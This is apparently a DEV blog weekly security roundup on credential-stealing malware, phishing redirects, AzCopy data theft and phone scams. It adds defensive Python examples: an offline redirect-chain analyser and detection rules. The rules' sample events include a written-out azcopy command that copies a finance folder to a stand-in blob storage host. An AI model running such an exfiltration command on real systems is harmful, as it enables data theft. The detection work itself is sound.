Introduction
What a week! I have no idea why I just wrote that 😊. Anyways, welcome to another edition of our security news weekly review here on DEV. In this week's edition, we'll cover the known themes of this series: malware, phishing, and online scams. That should be it; hopefully, I did not forget anything!
Let's begin!
Malware locks browser in kiosk mode to steal Google credentials
The story goes like this: frustrate the user into handing over their credentials. It is clever, no doubt.
Here is how the attack works, as stated in the article:
Specifically, the malware "locks" the user's browser on Google's login page with no obvious way to close the window, as the malware also blocks the "ESC" and "F11" keyboard keys. The goal is to frustrate the user enough that they enter and save their Google credentials in the browser to "unlock" the computer.
Once credentials are saved, the StealC information-stealing malware steals them from the credential store and sends them back to the attacker.
Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks
The article is based on research by Palo Alto Networks' Unit 42. In situations like this, the end goal for the threat actors is either your credentials or your money.
The following excerpt describes how the attack starts:
The starting point of the infection chain is an email message containing a link that mimics a legitimate or compromised domain that, when clicked, triggers the redirection to the actor-controlled credential harvesting page.
To lend the phishing attempt a veneer of legitimacy, the malicious webmail login pages have the recipients' email addresses pre-filled. Attackers have also been observed using legitimate domains that offer URL shortening, tracking, and campaign marketing services.
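The excerpt says the link "triggers the redirection" and that the landing page has the recipient's address pre-filled, but it does not spell out where the redirect lives. Below is an added example (my code, not the article's or Unit 42's) that walks a link's redirect chain offline and flags two things a practitioner would want to see: a redirect carried in a response header rather than in HTML (the `Location` header on a 3xx, or the `Refresh` header, which browsers honour even on a 200), and an e-mail address smuggled in the final URL. All domains, URLs and responses are constructed for the example.

```python
"""Added example, not from the article or from Unit 42: follow a phishing
link's redirect chain offline and flag the tricks the excerpt describes.

Two redirect carriers that need no HTML at all are the Location header on a
3xx response and the Refresh header, which browsers honour exactly like
<meta http-equiv="refresh"> even on a 200 response. The landing page
pre-fills the recipient's address, which usually means the address travels
in the URL (query string or fragment). All URLs and responses below are
constructed for the example.
"""
import re
from urllib.parse import urlsplit, urljoin, unquote

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Refresh header value looks like: "0; url=https://host/path"
REFRESH_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.IGNORECASE)


def redirect_target(status, headers):
    """Return (next_url, carrier) for one HTTP response, or (None, None).
    `headers` is a dict; the lookup is case-insensitive."""
    h = {k.lower(): v for k, v in headers.items()}
    if 300 <= status < 400 and "location" in h:
        return h["location"].strip(), "Location"
    if "refresh" in h:
        m = REFRESH_URL_RE.search(h["refresh"])
        if m:
            return m.group(1).strip(), "Refresh"
    return None, None


def find_prefilled_email(url):
    """Return an e-mail address carried in the URL's query, fragment or path,
    or None. Percent-encoding (victim%40corp.example) is decoded first."""
    parts = urlsplit(url)
    for chunk in (parts.query, parts.fragment, parts.path):
        m = EMAIL_RE.search(unquote(chunk))
        if m:
            return m.group(0)
    return None


def follow_chain(start_url, responses, max_hops=10):
    """Walk the chain using `responses` (url -> (status, headers)) instead of
    the network, so the analysis never touches the attacker's server."""
    hops, carriers = [start_url], []
    url = start_url
    for _ in range(max_hops):
        if url not in responses:
            break
        status, headers = responses[url]
        nxt, carrier = redirect_target(status, headers)
        if nxt is None:
            break
        url = urljoin(url, nxt)          # resolve relative targets
        hops.append(url)
        carriers.append(carrier)
    email = find_prefilled_email(url)
    return {
        "hops": hops,
        "final_url": url,
        "carriers": carriers,
        "prefilled_email": email,
        # Heuristic: a header-only (Refresh) hop, or an address in the final
        # URL, is the pattern the excerpt describes.
        "suspicious": "Refresh" in carriers or email is not None,
    }


# Constructed chain: shortener-style tracking link -> 302 to a "partner"
# page -> 200 with a Refresh header -> harvesting page with the victim's
# address in the fragment. Nothing here is a real domain.
SAMPLE_RESPONSES = {
    "https://links.tracker.example/c/9f3a": (
        302, {"Location": "https://cdn.partner.example/promo.html?u=victim%40corp.example"}),
    "https://cdn.partner.example/promo.html?u=victim%40corp.example": (
        200, {"Content-Type": "text/html",
              "Refresh": "0; url=https://webmail-login.example/auth#victim@corp.example"}),
    "https://webmail-login.example/auth#victim@corp.example": (
        200, {"Content-Type": "text/html"}),
}

if __name__ == "__main__":
    result = follow_chain("https://links.tracker.example/c/9f3a", SAMPLE_RESPONSES)
    for k, v in result.items():
        print(f"{k}: {v}")
```

A tool that only follows 3xx responses would stop at the second hop and never see the harvesting page; checking the `Refresh` header on every response, not just redirects, is the detail that matters here.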
Ransomware gangs now abuse Microsoft Azure tool for data theft
To be honest, I am not surprised. Threat actors have a long history of using legitimate services for malicious purposes. By the looks of it, it's not slowing down anytime soon.
The excerpt below is not about what's going on; instead, it's about how to defend against this attack (ransomware gangs using Microsoft's AzCopy tool to move stolen data into Azure Blob Storage):
Defense measures include monitoring for AzCopy execution, outbound network traffic to Azure Blob Storage endpoints at ".blob.core.windows.net" or Azure IP ranges, and setting alarms for unusual patterns in file copying or access on critical servers.
If Azure is already used in an organization, it is recommended to check the 'Logout on Exit' option to automatically sign out upon exiting the application, so as to prevent attackers from using the active session for file theft.
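The quoted defence measures (monitor AzCopy execution, watch outbound traffic to `.blob.core.windows.net`) are easy to state and worth seeing as actual detection logic. The block below is an added example, my own code and not from the article, run over constructed Sysmon-style process-creation (event 1) and network-connection (event 3) records. It also covers the browser-lock trick from the StealC story earlier in this post: a browser started in kiosk mode on Google's login page. The `--kiosk` switch is an assumption there; the article only says "kiosk mode". The process allowlist, hostnames and events are all made up.

```python
"""Added example, not from the article: detection logic for the defensive
measures quoted above, run over constructed Sysmon-style events.

Rules:
  1. azcopy_execution         - AzCopy started on a server
  2. blob_storage_egress      - outbound connection to *.blob.core.windows.net
                                from a process not expected to talk to Azure
  3. browser_kiosk_google_login - a browser launched with --kiosk on Google's
                                login page (the StealC browser-lock trick;
                                the exact switch is an assumption)
All events, hosts and the allowlist below are made up for the example.
"""
import re
from ntpath import basename   # handles Windows paths on any OS

AZURE_BLOB_SUFFIX = ".blob.core.windows.net"
# Processes that legitimately talk to Azure Blob Storage in this made-up
# environment. Tune per estate; on a file server this may well be empty.
ALLOWED_BLOB_PROCESSES = {"storageexplorer.exe", "backupagent.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
# azcopy may be renamed in the command line but usually not in its verbs;
# match the binary name at a path/space boundary.
AZCOPY_RE = re.compile(r'(?:^|[\\/\s"])azcopy(?:\.exe)?\b', re.IGNORECASE)
KIOSK_RE = re.compile(r"(?:^|\s)--kiosk(?:\s|=|$)", re.IGNORECASE)


def _alert(rule, ev, detail):
    return {"rule": rule, "host": ev.get("Computer", "?"),
            "image": ev.get("Image", "?"), "detail": detail}


def check_process_create(ev):
    """Rules that look at a process-creation event (Sysmon EventID 1)."""
    image = basename(ev.get("Image", "")).lower()
    cmd = ev.get("CommandLine", "")
    if image == "azcopy.exe" or AZCOPY_RE.search(cmd):
        yield _alert("azcopy_execution", ev, cmd)
    if image in BROWSERS and KIOSK_RE.search(cmd) \
            and "accounts.google.com" in cmd.lower():
        yield _alert("browser_kiosk_google_login", ev,
                     f"parent={ev.get('ParentImage', '?')} cmd={cmd}")


def check_network_connect(ev, allowed):
    """Rule that looks at a network-connection event (Sysmon EventID 3)."""
    host = ev.get("DestinationHostname", "").lower()
    image = basename(ev.get("Image", "")).lower()
    if host.endswith(AZURE_BLOB_SUFFIX) and image not in allowed:
        yield _alert("blob_storage_egress", ev,
                     f"{host}:{ev.get('DestinationPort', '?')}")


def detect(events, allowed=ALLOWED_BLOB_PROCESSES):
    """Run every rule over a list of event dicts; return the alerts."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            alerts.extend(check_process_create(ev))
        elif ev.get("EventID") == 3:
            alerts.extend(check_network_connect(ev, allowed))
    return alerts


# Constructed events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "FS01", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "Computer": "FS01", "Image": r"C:\Temp\azcopy.exe",
     "CommandLine": r'azcopy.exe copy "D:\Finance" "https://exfil123.blob.core.windows.net/c1?sv=2022-11-02&sig=REDACTED" --recursive',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "Computer": "FS01", "Image": r"C:\Temp\azcopy.exe",
     "DestinationHostname": "exfil123.blob.core.windows.net", "DestinationPort": 443},
    {"EventID": 3, "Computer": "ADMIN01", "Image": r"C:\Program Files\Azure Storage Explorer\StorageExplorer.exe",
     "DestinationHostname": "corpdata.blob.core.windows.net", "DestinationPort": 443},
    {"EventID": 1, "Computer": "WS42", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --kiosk https://accounts.google.com/signin",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\update.exe"},
    {"EventID": 1, "Computer": "WS42", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe https://dev.to", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['host']} {a['image']} :: {a['detail']}")
```

The allowlist is the interesting knob: the same Blob Storage connection from Azure Storage Explorer on an admin workstation is normal, while from a random binary in `C:\Temp` on a file server it is not, which is why the rule keys on the process, not just the destination.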
Walmart customers scammed via fake shopping lists, threatened with arrest
It's an interesting read, and it contains actual call recordings of the researchers' conversations with the scammers. Stay safe and don't fall for scams. Most importantly, educate your family and friends about this threat. What's more, a big shout-out to the author, Jérôme Segura of Malwarebytes.
Here is how the attack starts and what it leads to:
Case in point, a malicious ad campaign is abusing Walmart Lists, a kind of virtual shopping list customers can share with family and friends, by embedding rogue customer service phone numbers with the appearance and branding of the official Walmart site.
The scam ends in accusations of money laundering, threats of an arrest warrant, and pressure to transfer money into a Bitcoin wallet.
Fake GitHub Site Targeting Developers
What should I say? Education and web security awareness can go a long way in preventing you and me from falling for attacks like this. As a security-minded person, if I go to a site and it tells me to open the "Run" dialog box on a Windows machine, I'll take that as a red flag. But wait, how many people know this? Hopefully, a lot.
There is no excerpt for this one. Don't worry; it's a short and, hopefully, effective read.
Credits
Cover photo by Debby Hudson on Unsplash.
That's it for this week, and I'll see you next time.